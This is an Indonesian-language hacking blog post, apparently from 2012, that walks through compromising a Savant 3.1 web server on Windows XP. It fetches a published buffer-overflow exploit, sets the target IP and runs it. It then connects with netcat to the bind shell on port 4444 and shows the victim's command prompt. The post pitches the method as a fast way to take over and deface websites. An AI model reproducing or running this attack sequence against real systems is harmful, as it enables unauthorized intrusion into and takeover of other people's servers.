Searching...
June 28, 2012
Thursday, June 28, 2012

POC Owning Shell From Zero Day Attack [1]


Belakangan ini, saya menangkap traffic yang cukup menggiurkan di internet. 78% peretas indonesia ternyata sedang mencari tau konsep exploitasi yang cepat, dan mudah. Tidak ada yang lebih cepat dan mudah dari pada serangan zero day. Tidak seperti SQL injection yang memakan waktu paling cepat 5 menit sebelum peretas akhirnya mendapatkan akses ke dalam situs yang berkaitan. Namun zero day attack hanya membutuhkan waktu kurang dari 10 detik untuk mendapatkan shell.

Kali ini saya akan memberikan prove of concept dari exploit zero day yang saya buat di exploit-db. Dan anda akan melihat betapa cepatnya serangan ini berlangsung. Kali ini target saya adalah windows XP SP2 English. Target saya membuka HTTP port (80), dan menggunakan Savant versi 3.1 sebagai web servernya. Yang akan saya lakukan adalah mengeksploit Savant versi 3.1 dengan sederet script python, yang kemudian akan membuat Savant mengalami buffer overflow.

Exploit saya telah masuk dalam daftar database exploit db. Untuk pengguna backtrack, file ini dapat ditemukan dengan perintah.

Command :
root@red-dragon:~# cd /pentest/exploits/exploitdb/
root@red-dragon:/pentest/exploits/exploitdb# cat files.csv | grep -i savant | grep "red-dragon" | awk -F "," '{print "File located in:", $2, "| The filename is:",  $3, "by", $5}'
File located in: platforms/windows/remote/18401.py | The filename is: "Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)" by red-dragon


Ok. Kita sudah mendapatkan file exploit pada /pentest/exploits/exploitdb/platforms/windows/remote/18401.py. Tahap selanjutnya adalah membuat file ini menjadi peluru bagi web server.

1. Konfigurasi Exploit 

Untuk mengkonfigurasikan exploit, kita hanya perlu sedikit mengedit file exploit. Di dalam file exploit ini, terdapat bagian pengaturan IP target. Anda harus mengubah ini agar exploit dapat dikirim ke web server yang anda tuju. Sebelumnya, kita harus mengkopi file ini sehingga kita tidak mengubah file asli yang didownload dari exploitdb.

Command :
root@red-dragon:/pentest/exploits/exploitdb# cp platforms/windows/remote/18401.py /tmp/savant.py

File ini saya copy ke folder /tmp. Kemudian saya edit di bagian IP address menjadi IP target saya 10.10.1.128.

Command :
root@red-dragon:/tmp# nano savat.py

Ok. Setelah file di edit. Sekarang kita ke bagian PoC. Sesuai dengan fungsi file exploit kita, server akan membuka koneksi netcat pada port 4444 setelah exploit buffer overflow dikirim. Saya akan mencoba masuk ke dalam port 4444 sebelum exploit dikirim.

Command :
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) : Connection refused


Port ini masih tertutup. Kemudian saya kirim file exploit milik saya.

Command :
root@red-dragon:/tmp# python savant.py

Dan kita cek lagi dengan netcat.

root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Savant>



Perhatikan screenshoot di atas. Anda dapat melihat seberapa cepat zero day dalam melakukan defacing web dengan mengendalikan shell korban. Jika saya tidak mengambil screenshoot, waktu yang dibutuhkan oleh file exploit ini hanya 10 detik.

OWNED by : red-dragon

0 comment:

Post a Comment

 
Back to top!